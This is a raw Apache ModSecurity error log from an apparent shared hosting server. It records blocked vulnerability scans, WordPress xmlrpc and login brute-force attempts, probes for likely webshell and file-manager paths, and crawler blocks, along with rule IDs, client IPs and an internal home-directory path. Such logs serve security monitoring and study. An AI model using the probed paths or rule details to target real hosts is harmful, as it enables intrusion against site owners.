[Tue May 26 13:34:41.495010 2026] [security2:error] [pid 512344:tid 512547] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUGcbElyei4S77DQcYjgAAAEk"]
[Tue May 26 13:34:43.195108 2026] [security2:error] [pid 512344:tid 512486] [client 75.102.28.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVUGsbElyei4S77DQcYugAAAAw"]
[Tue May 26 13:34:43.843553 2026] [security2:error] [pid 512344:tid 512565] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUG8bElyei4S77DQcY0AAAAFs"]
[Tue May 26 13:34:43.845778 2026] [security2:error] [pid 512344:tid 512594] [client 17.241.219.58:50168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.219.241.17.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/index.php/portfolio_page/ideamachine/"] [unique_id "ahVUG8bElyei4S77DQcY4AAAAHg"]
[Tue May 26 13:34:44.587750 2026] [security2:error] [pid 512344:tid 512535] [client 114.119.138.207:25481] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "anujtradingco.com"] [uri "/features/lightbox-options"] [unique_id "ahVUHMbElyei4S77DQcY-QAAAD0"], referer: http://premiumproxy.net/check-headers-status/GET/http:/barbn.aivhkenb.se/map8.php
[Tue May 26 13:34:44.735667 2026] [security2:error] [pid 512344:tid 512516] [client 122.172.83.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.xllent.in"] [uri "/index.php"] [unique_id "ahVUHMbElyei4S77DQcY_AAAACo"], referer: https://www.xllent.in/contact-us/
[Tue May 26 13:34:44.736153 2026] [security2:error] [pid 512344:tid 512568] [client 122.172.83.27:21534] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.xllent.in"] [uri "/captcha.php/"] [unique_id "ahVUHMbElyei4S77DQcY9QAAXmE"], referer: https://www.xllent.in/contact-us/
[Tue May 26 13:34:46.478836 2026] [security2:error] [pid 512344:tid 512587] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUHsbElyei4S77DQcZNgAAAHE"]
[Tue May 26 13:34:48.411569 2026] [security2:error] [pid 512344:tid 512347] [remote 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVUIMbElyei4S77DQcZiwAAQgI"]
[Tue May 26 13:34:48.411814 2026] [security2:error] [pid 512344:tid 512540] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVUIMbElyei4S77DQcZiwAAQgI"]
[Tue May 26 13:34:48.590773 2026] [security2:error] [pid 512344:tid 512517] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUIMbElyei4S77DQcZgQAAACs"]
[Tue May 26 13:34:50.879291 2026] [security2:error] [pid 512344:tid 512516] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUIsbElyei4S77DQcZ0QAAACo"]
[Tue May 26 13:34:51.582717 2026] [security2:error] [pid 512344:tid 512477] [client 114.119.152.54:32721] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/referanslar/mersin-web-tasarim-jakuzi-fabrikasi"] [unique_id "ahVUI8bElyei4S77DQcaAAAAAAM"], referer: http://cagmedya.com/
[Tue May 26 13:34:52.882955 2026] [security2:error] [pid 512344:tid 512587] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUJMbElyei4S77DQcaHgAAAHE"]
[Tue May 26 13:34:54.934578 2026] [security2:error] [pid 512344:tid 512516] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUJsbElyei4S77DQcaZAAAACo"]
[Tue May 26 13:34:57.213891 2026] [security2:error] [pid 512344:tid 512521] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUKMbElyei4S77DQcarAAAAC8"]
[Tue May 26 13:34:57.683561 2026] [security2:error] [pid 512344:tid 512556] [client 4.204.220.190:8788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kmmc.co.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVUKcbElyei4S77DQca0gAAAFI"]
[Tue May 26 13:34:57.683739 2026] [security2:error] [pid 512344:tid 512556] [client 4.204.220.190:8788] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kmmc.co.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVUKcbElyei4S77DQca0gAAAFI"]
[Tue May 26 13:34:57.826666 2026] [security2:error] [pid 512344:tid 512495] [client 4.204.220.190:9097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kmmc.co.in"] [uri "/about.php"] [unique_id "ahVUKcbElyei4S77DQca0wAAABU"]
[Tue May 26 13:34:57.826779 2026] [security2:error] [pid 512344:tid 512495] [client 4.204.220.190:9097] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kmmc.co.in"] [uri "/about.php"] [unique_id "ahVUKcbElyei4S77DQca0wAAABU"]
[Tue May 26 13:34:58.794272 2026] [security2:error] [pid 512344:tid 512515] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahVUKMbElyei4S77DQcapQAAACk"]
[Tue May 26 13:34:59.199766 2026] [security2:error] [pid 512344:tid 512488] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUKsbElyei4S77DQca8wAAAA4"]
[Tue May 26 13:35:00.294694 2026] [security2:error] [pid 512344:tid 512585] [client 115.98.9.72:59771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.9.98.115.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/xmlrpc.php"] [unique_id "ahVULMbElyei4S77DQcbJAAAAG8"]
[Tue May 26 13:35:00.294894 2026] [security2:error] [pid 512344:tid 512585] [client 115.98.9.72:59771] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kexcouriers.com"] [uri "/xmlrpc.php"] [unique_id "ahVULMbElyei4S77DQcbJAAAAG8"]
[Tue May 26 13:35:00.791943 2026] [security2:error] [pid 512344:tid 512595] [client 80.76.42.216:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVULMbElyei4S77DQcbNwAAAHk"], referer: https://www.anujtradingco.com/
[Tue May 26 13:35:01.597600 2026] [security2:error] [pid 512344:tid 512480] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVULcbElyei4S77DQcbQAAAAAY"]
[Tue May 26 13:35:01.895857 2026] [security2:error] [pid 512344:tid 512519] [client 80.76.42.216:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVULcbElyei4S77DQcbVAAAAC0"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430896&moderation-hash=683babac959ef6b0812e0407a9e1141b
[Tue May 26 13:35:03.560773 2026] [security2:error] [pid 512344:tid 512507] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUL8bElyei4S77DQcbcQAAACE"]
[Tue May 26 13:35:04.620554 2026] [security2:error] [pid 512344:tid 512544] [client 45.94.31.11:60867] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVUMMbElyei4S77DQcbkgAAAEY"]
[Tue May 26 13:35:05.167812 2026] [security2:error] [pid 512344:tid 512591] [client 45.94.31.11:61034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 11.31.94.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cargo-pulse.info"] [uri "/xmlrpc.php"] [unique_id "ahVUMMbElyei4S77DQcbmgAAAHU"]
[Tue May 26 13:35:05.480434 2026] [security2:error] [pid 512344:tid 512551] [client 45.94.31.11:61144] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVUMcbElyei4S77DQcbrgAAAE0"]
[Tue May 26 13:35:05.694934 2026] [security2:error] [pid 512344:tid 512553] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUMcbElyei4S77DQcbpwAAAE8"]
[Tue May 26 13:35:05.785614 2026] [security2:error] [pid 512344:tid 512546] [client 45.94.31.11:61188] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVUMcbElyei4S77DQcbtgAAAEg"]
[Tue May 26 13:35:06.091259 2026] [security2:error] [pid 512344:tid 512492] [client 45.94.31.11:61231] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVUMsbElyei4S77DQcbvQAAABI"]
[Tue May 26 13:35:06.395210 2026] [security2:error] [pid 512344:tid 512558] [client 45.94.31.11:61265] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVUMsbElyei4S77DQcbygAAAFQ"]
[Tue May 26 13:35:06.700872 2026] [security2:error] [pid 512344:tid 512520] [client 45.94.31.11:61299] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahVUMsbElyei4S77DQcb1wAAAC4"]
[Tue May 26 13:35:06.753391 2026] [core:error] [pid 512344:tid 512531] [client 24.199.114.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:35:06.753404 2026] [core:error] [pid 512344:tid 512531] [client 24.199.114.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:35:06.980574 2026] [security2:error] [pid 512344:tid 512529] [client 179.36.152.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUMsbElyei4S77DQcb1gAAADc"]
[Tue May 26 13:35:07.013872 2026] [security2:error] [pid 512344:tid 512562] [client 45.94.31.11:61326] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVUM8bElyei4S77DQcb6AAAAFg"]
[Tue May 26 13:35:07.338771 2026] [security2:error] [pid 512344:tid 512476] [client 45.94.31.11:61339] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVUM8bElyei4S77DQcb8QAAAAI"]
[Tue May 26 13:35:07.644293 2026] [security2:error] [pid 512344:tid 512560] [client 45.94.31.11:61366] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVUM8bElyei4S77DQccAQAAAFY"]
[Tue May 26 13:35:07.850191 2026] [security2:error] [pid 512344:tid 512538] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUM8bElyei4S77DQcb-gAAAEA"]
[Tue May 26 13:35:07.952898 2026] [security2:error] [pid 512344:tid 512498] [client 45.94.31.11:61396] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahVUM8bElyei4S77DQccCQAAABg"]
[Tue May 26 13:35:08.257676 2026] [security2:error] [pid 512344:tid 512509] [client 45.94.31.11:61439] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVUNMbElyei4S77DQccEQAAACM"]
[Tue May 26 13:35:08.566054 2026] [security2:error] [pid 512344:tid 512529] [client 45.94.31.11:61476] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahVUNMbElyei4S77DQccGAAAADc"]
[Tue May 26 13:35:08.584522 2026] [core:error] [pid 512344:tid 512505] [client 24.199.114.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://webmail.moes-art.com/
[Tue May 26 13:35:08.584541 2026] [core:error] [pid 512344:tid 512505] [client 24.199.114.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://webmail.moes-art.com/
[Tue May 26 13:35:09.275545 2026] [http2:info] [pid 536875:tid 536875] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 13:35:09.747835 2026] [security2:error] [pid 536875:tid 537035] [client 74.249.173.207:4498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "elipress.com.br.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVUNer_-FTveSGlx1HNugAAAKM"]
[Tue May 26 13:35:09.802928 2026] [security2:error] [pid 536875:tid 537013] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUNer_-FTveSGlx1HNrQAAAI0"]
[Tue May 26 13:35:10.240270 2026] [security2:error] [pid 536875:tid 537048] [client 74.249.173.207:4515] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "elipress.com.br.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVUNur_-FTveSGlx1HNyAAAALA"]
[Tue May 26 13:35:11.627220 2026] [security2:error] [pid 536875:tid 536880] [remote 74.208.170.33:40296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.170.208.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVUN-r_-FTveSGlx1HN4gAA4QQ"]
[Tue May 26 13:35:12.208633 2026] [security2:error] [pid 536875:tid 537117] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUN-r_-FTveSGlx1HN7AAAAPU"]
[Tue May 26 13:35:13.880793 2026] [security2:error] [pid 536875:tid 537067] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUOer_-FTveSGlx1HOGAAAAMM"]
[Tue May 26 13:35:15.532173 2026] [security2:error] [pid 536875:tid 537041] [client 74.249.173.207:4494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "elipress.com.br.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahVUO-r_-FTveSGlx1HOUwAAAKk"]
[Tue May 26 13:35:16.271214 2026] [security2:error] [pid 536875:tid 537072] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUO-r_-FTveSGlx1HOXQAAAMg"]
[Tue May 26 13:35:17.038024 2026] [security2:error] [pid 536875:tid 537067] [client 74.249.173.207:4512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "elipress.com.br.md-74.webhostbox.net"] [uri "/function/function.php"] [unique_id "ahVUPer_-FTveSGlx1HOegAAAMM"]
[Tue May 26 13:35:18.542110 2026] [security2:error] [pid 536875:tid 537055] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUPur_-FTveSGlx1HOngAAALc"]
[Tue May 26 13:35:20.209402 2026] [security2:error] [pid 536875:tid 537024] [client 66.249.64.98:51265] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Googlebot[\\\\/-]" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/google.conf"] [line "3"] [id "901003"] [msg "Googlebot Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "www.acdealernoida.in"] [uri "/robots.txt"] [unique_id "ahVUQOr_-FTveSGlx1HO1QAAAJg"]
[Tue May 26 13:35:20.606726 2026] [security2:error] [pid 536875:tid 537068] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUQOr_-FTveSGlx1HO0QAAAMQ"]
[Tue May 26 13:35:21.279944 2026] [security2:error] [pid 536875:tid 536920] [remote 95.216.117.13:51426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVUQer_-FTveSGlx1HO6gAAtCw"]
[Tue May 26 13:35:21.329886 2026] [security2:error] [pid 536875:tid 536982] [remote 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVUQer_-FTveSGlx1HO6wAA3Wo"]
[Tue May 26 13:35:21.330021 2026] [security2:error] [pid 536875:tid 537093] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVUQer_-FTveSGlx1HO6wAA3Wo"]
[Tue May 26 13:35:22.915031 2026] [security2:error] [pid 536875:tid 537028] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUQur_-FTveSGlx1HPDgAAAJw"]
[Tue May 26 13:35:24.362712 2026] [security2:error] [pid 536875:tid 536992] [remote 74.7.241.58:43372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVUROr_-FTveSGlx1HPRwAAp3Q"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/wpforms-lite/templates/admin/payments
